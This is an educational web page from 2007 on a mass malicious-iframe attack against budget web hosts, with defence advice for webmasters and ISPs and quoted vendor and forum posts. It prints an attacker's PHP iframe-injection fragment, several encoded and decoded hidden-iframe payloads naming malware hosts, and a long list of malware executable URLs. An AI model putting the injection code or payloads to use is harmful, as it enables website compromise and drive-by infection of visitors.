Softpanorama
(slightly skeptical) Open Source Software Educational Society

May the source be with you, but remember the KISS principle ;-)

Malicious iframe attack

News	See also	Recommended Links	Recommended Books	Recommended Papers	Web Server Security	Zombies
Cheap Web hosting with SSH access	Spyware fighting strategy	Identity theft	Adding sites to the hosts file	Phishing	Cheap Web hosting with SSH access	Etc

Reportedly, in July 2007 there is a new massive hacking attack on web sites. This attack targeted primarily budget Webhosting providers but it was not limited to them. For example several site from HBS were compromised too. SANS has another List Of Compromised Sites

It looks like the attack usually has two stages.

Account passwords harvesting. On the first state they collect passwords for the accounts. We will call this stage "account passwords harvesting". Details on how they do that are fuzzy. The truth is that on a typical Linux server it might enough to get just one user account password to be in a reasonably good position to get the root via some king of little known or unpatched exploit. Zones and jails are better in this respect as they protect other users from easily compromised "suckers" who happily use passwords like 123456 or use infected with spyware PCs at home. Actually the complexity of the password should be beefed up to at least 8 characters. But this does not help if the user computer is infected with a keylogger. ISPs need to handle vastly difference classes of users and security is always as good as the weakest link.
Mass modification of index files. On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document.

This attack stresses the fact that Web browsers should now be installed on VM and used with a special disposable image of Windows. Please consider using Microsoft Virtual PC or VMware and opening a separate instance of OS for browsing if you did not do it already.

Account passwords harvesting

The best description of the first phase that I found is from Hosting Reviews at Hostjury.com - Blog and is related to Dreamhost. In no way you should consider that Dreamhost was alone. They were just more open about it and I would give they high credits. Most other providers affected tried to swipe the dirt under the carpet.

According to an e-mail sent out to many Dreamhost clientele earlier today there have been over 3,500+ hosting accounts exploited at Dreamhost.

The suspected entry point into the accounts was most likely password sniffing however there are many other rumors surrounding the event.

This exploit quickly followed a recent exploit of IPowerWeb that resulted in the defacement of over 35% of the IPowerWeb clientbase. Earlier this year exploits affected Hostgator & many other large providers whose systems were rooted.

A copy of the e-mail sent out by the dreamhost team is below:

From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your ‘XXXX’ FTP account.

We have detected what appears to be the exploit of a number of accounts belonging to DreamHost customers, and it appears that your account was one of those affected.

We’re still working to determine how this occurred, but it appears that a 3rd party found a way to obtain the password information associated with approximately 3,500 separate FTP accounts and has used that information to append data to the index files of customer sites using automated scripts (primarily for search engine optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed - less than 0.15% of the total accounts that we host - actually had any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

Immediately change your FTP password, as well as that of any other accounts that may share the same password. We recommend the use of passwords containing 8 or more random letters and numbers. You may change your FTP password from the web panel (”Users” section, “Manage Users” sub-section).

Review your hosted accounts/sites and ensure that nothing has been uploaded or changed that you did not do yourself. Many of the unauthorized logins did not result in changes at all (the intruder logged in, obtained a directory listing and quickly logged back out) but to be sure you should carefully review the full contents of your account.

Again, only about 20% of the exploited accounts showed any modifications, and of those the only known changes have been to site index documents (ie. ‘index.php’, ‘index.html’, etc - though we recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct access to our internal customer information database, but this was thwarted by protections we have in place to prevent such access. Similarly, we have seen no indication that the intruder accessed other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-scenes changes to improve internal security, including the discovery and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this particular security breach and keep customers apprised of what we find. Once we learn more, we will be sure to post updates as they become available to our status weblog: http://www.dreamhoststatus.com/

Thank you for your patience. If you have any questions or concerns, please let us know.

Mass modification of site files

On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (ie. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document. That might be because of different tools of different version/modes of work of MPACK. But there are other cases when all documents were modified by replacing <body> tag [SANS Internet Storm Center] :

After checking were the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.

One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.

Two things were obvious here:

The hosting web server did not have proper security on the file system level. This is, unfortunately, pretty common for (cheap?) hosting servers and is required when PHP is executed as a module in Apache. In this case, the main Apache process must be able to at least read all the files, but it appeared that it was able to write to them as well (wrong file permissions maybe?).

The attackers had to find only one vulnerable PHP script on the server (note – the server might have been hosting thousands of different web sites).

Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:

for ($i = 3; $i < 500; $i++) {
      if ($i == 438) continue;
      flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
      iframe_account(array('/home/sites/site' . $i . '/web'));
}

From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().

This function takes every director and performs a recursive search for 4 file types:

$file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “</body>” tag which is replaced with the malicious iframe and properly closed:

$iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);

And voila – a mass compromise happened.

Here is how .Symantec Security Response Weblog describes the tool:

You always thought that by staying clear of the dark alleys of the Internet and visiting only “reputable” websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits.
As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.

The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.

This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows for the iframe to be injected at the top or bottom of the page and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return-on-investment, the tool can check the Google PageRank for the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.

To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors’ iframes injected in the page. And of course, extensive logs and statistics are provided.

This tool itself however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator’s credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with latest patches as well as your anti-virus program.

Posted by Amado Hidalgo on June 19, 2007 11:39 AM

The actual exploit is an encoded IFRAME pointing to the web site with malware.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

Pages in hacked web sites are modified using IFRAME to connect to one of many "seed sites" which run scripts that either:

Uses social engineering to entice the user to download malicious Trojan into his PC (for example masking it as a plug-in that is needed to view the content). Again in this case the download of the trojan is usually masked as plug-in from a reputable vendor (for example Microsoft), the plug-in that supposedly is necessary for viewing hacked site. Some gullible users accept such an invitation.
Try to use serious of web browser exploits to break to a PC with unpatched IE6 or Firefox.
- There is an old vulnerability covered in Microsoft Security Bulletin MS04-040 HTML Elements Vulnerability - CAN-2004-1050: The remote code execution vulnerability exists in unpatched Internet Explorer that could allow remote code execution on an affected system. An attacker could exploit the vulnerability by constructing a malicious Web Page that could potentially allow remote code execution if a user visited a malicious Web site. An attacker
who successfully exploited this vulnerability could take complete control of an affected system.
Possibly uses other more subtle attack vectors.
- Inserting invalid information into the viewstate field with the objective of causing the application to throw an exception and to log the exception. If, however, you open the error log file via a browser and the application's error log viewer, some of what the attacker has inserted into the viewstate may be rendered as HTML. If the attacker has put in an iframe with a reference to a live webpage, you would in effect be forced to run the webpage. This would not be dissimilar to you visiting a website with hostile scripting code.

Recommended webmaster reaction to the exploit

Save hacked index page for further analysys and restore the page from the archive. If you do not have an archive located the fragment in the index page and delete (see below on how to do that).
Change your FTP account password. Most probably it was compromised.
If possible reconfigure your FTP account to accept connections only from the IP range that you use (in case you use DHCP it can be IP range of your ISP).
If possible block access to sites which provides WEB services for the exploit (see below hos to dermine them out of the encoded string in the exploit

Search your webpages using grep for strings like "document.write(unescape("
or other notable string that you can detect on the affected page, for example:

<script type="text/javascript">

	<!--

	document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

	//-->

	</script>

That will give some assurance that this exploit was used only on index document of your WEB site. and was not replicated on other pages.

Install a cron script that periodically searches your Web pages for the string typical for the exploit used ("document.write(unescape(" in the case above), sends you email if found and restore the file(s) in quiestion from the backup.
Check if you ISP uses the latest version of Apache with security fixes. You can check this using telnet

telnet www.mysite.com 80
12:12
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method
Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
♥ to /index.h
tml not supported.<P>
Invalid method in request \x03<P>
<HR>
<ADDRESS>Apache/1.3.33
Server at myhost.myisp.com Port 80</ADDRESS>
</BODY></HTML>
Connection to host lost.
Here you can see that the version of web server is old. that does not necessary means that it is vulnerable but still is this of some concern (the latest is 1.3.37).
If you have custom scripts it might be prudent to analyze their security.

Decoding the IFRAME content and determining the site with malicious content

The encoded fragment that you have found can be decoded via many sites. For example you can use HTML & JavaScript Encoder-Decoder In the case of an exploit listed above the actual code is as following:

<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>

That means that you need to block 203.121.73.33 to increase the chances of avoiding infecting users in case of reinfection.

Recommendations for ISPs

ISPs which do not provide users with shell access, might be hurt if such attacks became recurrent as this is in essence an attack on the business model of cheap, reliable hosting when part of reliability is achieved by not providing ssh access to users.

I would propose several steps that can compensate for the lack of shell access:

It is unclear how they harvest password and to find the answer to this question is of paramount importance. If user password are stored in clear, you should consider adopting an encoding scheme.
One of the problems is weakness of VDECK as software for those ISPs which use it (I have no experience with Cpanel).
- Press VDECK vendor to do a better job.
- Fix the bugs in VDECK for example in for blocking sites (old versions generates wrong .htacess file).
Provide users with several "precooked" cron scripts
- To list all files on the server modified during the last 24 hours and all files that contain string "document.write(unescape("
- To untar arbitrary file (VDECK solution for restoring backup is stupid beyond any redemption). This can be used for periodic restoration of site index from the tar.gz backup. If several files were compromised they all should be listed in the cron script.
- To tar arbitrary subtree of the site excluding certain types of files (.gz, .zip, etc).
It look like the attack target Apache so there might be a need to revise and improve the Apache configuration to make more resistant to attacks. As Sophos mentions in its blog entry Mal-ObfJS-C Where When

Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry <http://www.sophos.com/security/blog/2007/06/250.html> Friday.

That might be just a side effect of the fact that this attack targeted budget ISPs.

Notes:

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Some amount of grammar and spelling errors should be expected.
The site contain some broken links as it develops like a living tree... Please try to use Google, Open directory, etc. to find a replacement link (see HOWTO search the WEB for details). We would appreciate if you can mail us a correct link.

Google Search
Open directory	Research Index

Old News ;-)

[ Jun 28, 2007] Mal-ObfJS-C Where When

"... the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix."

22 June 2007 11:42 GMT

For the past 7 weeks SophosLabs have been tracking an attack targeting sites all over the world. In the attack, legitimate sites have been compromised so that they serve up a malicious JavaScript (Mal/ObfJS-C). In this post, I present a brief summary of the data obtained thus far.

Since May 1st, we have found 3,896 URLs that have been compromised, over 1,627 different domains. The subject matter of the hacked sites covers as wide a range of topics as you can imagine. Clothes boutiques, driving instruction, nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical instruments. Most worryingly, there are some fairly popular sites within the list, including a fairly large bank (this site was hacked last week). Taking a deeper look at the data, we can gather further information about this campaign.

As you can see from the following graph (note the log scale on the y-axis), the vast bulk of the compromised pages are being served up from sites in the United States, closely followed by Brazil, Canada and the UK.

It should be noted this data is based on the country in which the host web server resides - it does not indicate the locale of the site itself. For example, several ‘.co.uk’ domains were found to be hosted within the US.

To get a true impression of the scale of such an attack, looking at domain names alone is insufficient. We have encountered previous cases where initial data based on a plethora of compromised domains has suggested a large campaign, only to find that they all were as the result of the hacking of a handful of boxes within a single service provider (Troj/EncIfr-A for example). Looking at this data from an IP perspective reveals 324 unique IP addresses, the bulk of which are hosting a low number of compromised sites.

As might be expected, we can see that in several cases, once the hackers have managed to hack a server, they have compromised several sites hosted there.

Probing further, we can try to identify the operating system and web server application. As you can see below, the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix.

Though we cannot deduce the method employed by the hackers to compromise the servers, such data is nonetheless interesting. Gathering and analysis of such data provides us with valuable information to assist in the fight against web attacks. As ever, it is imperative that web servers are maintained and patched to the latest level. If you outsource the responsibility of this to your ISP, ensure they follow good practice. Remember, their failure could lead to your loss of credibility if it is your site that gets hacked into a malicious drive-by.

Fraser, SophosLabs UK

script added to my site (not by me)

Typical reaction after discovery of the imbedded iframe.

<pre>
Could someone help me out and tell me what this is:
<html>
<body>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20% 73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69 %64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%3 1%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72% 61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d %22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%6 8%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a% 3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33 %2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%6 8%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61% 6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22 %65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%2 2%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f% 69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73 %72%63%3d%22%65%78%70%35%2e%68%74%6d%22%20%77%69%6 4%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31% 22%3e%3c%2f%69%66%72%61%6d%65%3e"));
</script>
</body>
</html>
</pre>

Strange mix-up in Thunderbird - mozilla.support.thunderbird Google Groups

Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.

>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.

> either an extensions is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.

Thanks for your reply, but add-ons are certainly not the cause.

Could this exploit code from a malware site affect Firefox - mozilla.support.firefox Google Groups

span class="fontsize0 " id="prof" style="DISPLAY: none">View profile "OMA" <omol...@inicia.es> wrote in news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org: > I'd like to know if that code could exploit any vulnerability > in Firefox, and thus if it may have affected my system. .
No. In IE, clicking on the executable would run it. In FF, you can only download an executable file, then you have to browse to the saved file and click it yourself, manually. -- Mozilla & Netscape FAQs: http://www.ufaq.org/ Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/ Web page validation: http://validator.w3.org

About Mozilla: http://www.mozilla.org Ambition is a poor excuse for not having the good sense to be lazy. More options Jun 24, 11:00 pm

Newsgroups: mozilla.support.firefox

From: Chris Jahn <clj...@netscape.net.invalid>

Date: Sun, 24 Jun 2007 22:00:23 -0500

Local: Sun, Jun 24 2007 11:00 pm

Subject: Re: Could this exploit code from a malware site affect Firefox?

"OMA" <omol...@inicia.es> wrote in
news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org:

> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.

No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.

--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org

Ambition is a poor excuse for not having the good sense to be
lazy.

Reply to author Forward Aggro More options Jun 25, 10:48 am Newsgroups: mozilla.support.firefox
From: Aggro <spammerdr...@yahoo.com>

Date: Mon, 25 Jun 2007 17:48:44 +0300

Local: Mon, Jun 25 2007 10:48 am

Subject: Re: Could this exploit code from a malware site affect Firefox?

Reply | Reply to author | Forward | Print | Individual message | Show original | Report this message | Find messages by this author

OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.

There seems to be a large loop. That probably caused your browser to
froze. Frozing is not an indication that they managed to do something to
your computer.
It looks like "Internet Explorer createControlRange Object Buffer Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html

So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.

--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29

CastleCops® omega-it.ru

WOW this is ALL from omega-it.ru, Wow I feel sorry for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and bankers and a few sdbots. wow jsut from one computer network
http://www.lovemoney88.com/mm/1.exe
http://www.lovemoney88.com/mm/2.exe
http://www.lovemoney88.com/mm/3.exe
http://www.lovemoney88.com/mm/4.exe
http://www.lovemoney88.com/mm/5.exe
http://www.lovemoney88.com/mm/6.exe
http://www.lovemoney88.com/mm/7.exe
http://www.lovemoney88.com/mm/8.exe
http://www.lovemoney88.com/mm/9.exe
http://www.lovemoney88.com/mm/10.exe
http://www.lovemoney88.com/top/top.exe
http://soft.trustincash.com/loader/exe/ticads.exe
http://soft.trustincash.com/loader/exe/tse.exe
http://soft.trustincash.com/loader/exe/b2.exe
http://soft.trustincash.com/loader/exe/u.exe
http://81.29.241.195/part/joke.exe
http://megafastsuperhost.net/loader.exe
http://tyt-menia.net/s32.exe
http://ddl-help.info/readme.exe
http://execucom.co.uk/img/load.exe
http://www.laydy.net/file.exe
http://laydy.net/1/1.exe
http://laydy.net/2/2.exe
http://www.norton-nod32.com/trf/sp_6/file1.exe
http://www.norton-av2007.com/trf/tools/calc.exe
http://www.smalltool.net/new.exe
http://serv263.info/rss/demo.exe
http://a-commando.info/zupastik.exe
http://bahep.info/file.exe
http://coco32.org/o/exp/r/install1.exe
http://208.64.26.150/spm/loader.exe
http://208.64.26.150/spm/2loader.exe
http://208.64.26.150/test1.exe
http://208.64.26.150/spm/4loader.exe
http://205.209.179.15/aff/dir/cent.exe
http://205.209.179.15/aff/dir/pdp.exe
http://70.47.53.19/~soft/bin/iexplore.exe
http://81.95.146.206/windar.exe
http://72.29.67.138/vx0125b.exe
http://70.47.53.19/~soft/bin/ieschedule.exe
http://spywaresoftstop.com/download/sss_setup.exe
http://serv263.info/st.exe
http://laydy.net/3/3.exe
http://laydy.net/4/4.exe
http://laydy.net/5/5.exe
http://81.95.149.235/asm/file.exe
http://coco32.org/tn/axt.exe
http://www.coco32.org/clients/lx001.exe
http://www.coco32.org/clients/137-15.exe
http://s1.rollsystems.info/files/bild.exe
http://coco32.org/tn/axt.exe
http://allddos.biz/sp//b.exe
http://allddos.biz/sp//p.exe
http://hostbiz.info/fgh.exe
http://huyamilka.com/adv/190/win32.exe
http://58.65.232.10/mrkg/l1.exe
http://58.65.232.10/mrkg/l2.exe
http://www.moneyboomtown.com/images/realfoto.exe
http://qazxcdew.by.ru/file.exe
http://miramax-invest.net/ivan/load.exe
http://wert-co.ru/1.exe
http://fotballportal.info/kill/1.exe
http://thekurt.info/load.exe
http://stat1count.net/adv/014/win32.exe
http://bfstats.info/img/avatars/s/123.exe
http://cards.funnystories.ru/adv007.exe
http://cards.funnystories.ru/bot.exe
http://cards.funnystories.ru/img/adv7.exe
http://sun-ww.net/bG9hZGVy/c25hdGNo.exe
http://wow02.w125.west263.cn/mtv/ook.exe
http://baserionkerjans.com/dlksr32.exe
http://baserionkerjans.com/m.2.16.exe
http://baserionkerjans.com/sysmwbt.exe
http://baserionkerjans.com/asr.exe
http://baserionkerjans.com/crslc.exe
http://baserionkerjans.com/KB070517sk.exe
http://baserionkerjans.com/fdd32.exe
http://slil.ru/24353191/919567585/Instal.exe
http://xuyhadesunkadwi.com/fdd32.exe
http://xuyhadesunkadwi.com/asr.exe
http://xuyhadesunkadwi.com/KB070517sk.exe
http://xuyhadesunkadwi.com/c.8.0.exe
http://xuyhadesunkadwi.com/m.2.16.exe
http://xuyhadesunkadwi.com/crslc.exe
http://xuyhadesunkadwi.com/sysmwbt.exe
http://xuyhadesunkadwi.com/dlksr32.exe
http://yuvideo.org/UD2.exe
http://counter-forever.cn/sp_pack/counter/Dropper.exe
http://81.95.148.188/20509.exe
http://zjabutkcjdctv.biz/d1.exe
http://zjabutkcjdctv.biz/d2.exe
http://zjabutkcjdctv.biz/d3.exe
http://www.skytrip.org/p/p.exe
http://216.255.180.6/2497.exe
http://hack-off.info/sb/sferhtemp.exe
http://81.95.149.235/cmddd/216.exe
http://81.95.149.235/cmddd/mail.exe
http://75.126.226.224/aff/dir/alt.exe
http://75.126.226.224/aff/dir/pee.exe
http://inspekt.biz/update.exe
http://inspekt.biz/svchostes.exe
http://ak.ipv1.info/s3.0.exe
http://falop5fas.com/0.exe
http://boln7be8.com/0.exe
http://nower5re9.com/0.exe
http://a-commando.info/ll.exe
http://75.126.21.162/aff/dir/sams.exe
http://zjabutkcjdctv.biz/d4.exe
http://agressor.info/hello.exe
http://hertunjinkdesinl.com/rs34sk.exe
http://hertunjinkdesinl.com/gdf32.exe
http://baserionkerjans.com/gdf32.exe
http://baserionkerjans.com/rs34sk.exe
http://baserionkerjans.com/mdt.exe
http://hertunjinkdesinl.com/dlksr32.exe
http://hertunjinkdesinl.com/m.2.16.exe
http://hertunjinkdesinl.com/sysmwbt.exe
http://hertunjinkdesinl.com/asr.exe
http://hertunjinkdesinl.com/mdt.exe
http://hertunjinkdesinl.com/crslc.exe
http://hertunjinkdesinl.com/KB070517sk.exe
http://hertunjinkdesinl.com/fdd32.exe
http://hertunjinkdesinl.com/c.8.0.exe
http://xuyhadesunkadwi.com/gdf32.exe
http://xuyhadesunkadwi.com/rs34sk.exe
http://xuyhadesunkadwi.com/mdt.exe
http://81.95.149.235/cmddd/215.exe
http://www.ctv163.com/admin/qq.exe
http://baserionkerjans.com/csrcss.exe
http://hertunjinkdesinl.com/csrcss.exe
http://xuyhadesunkadwi.com/csrcss.exe
http://falop5fas.com/1.exe
http://boln7be8.com/1.exe
http://nower5re9.com/1.exe
http://opaga.com/d/f/system.exe
http://www.tbporno.com/soft/tbporno_2.58.exe
http://xuyhadesunkadwi.com/svchcc32.exe
http://baserionkerjans.com/svchcc32.exe
http://hertunjinkdesinl.com/svchcc32.exe
http://81.176.20.4/1.exe
http://216.255.189.214/aff/dir/sony.exe
http://66.148.74.35/aff/dir/sony.exe
http://66.148.74.7/aff/dir/sony.exe
http://66.148.74.35/aff/dir/pdp.exe
http://85.249.23.43/1.exe
http://teryunkasewion.com/skl32.exe
http://2005-search.com/go.exe
http://www.ctv163.com/heixia/q.exe
http://72.20.4.126/dload.exe
http://72.20.4.126/5.exe
http://a-commando.info/zzz.exe
http://www.lightsgb.net/inst.exe
http://www.newoldway.info/winhp32cln.exe
http://81.95.149.235/loads/load2.exe

The new malware ecology

Ethan Zuckerman has a fascinating story about how contemporary malware works.
It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

script language=”javascript”> document.write( unescape(
‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E’
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear - it inserts the following code into the top of the HTML page:

< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install - Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

Netcraft IFRAME Exploit Spreading Through Banner Ads

Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag.
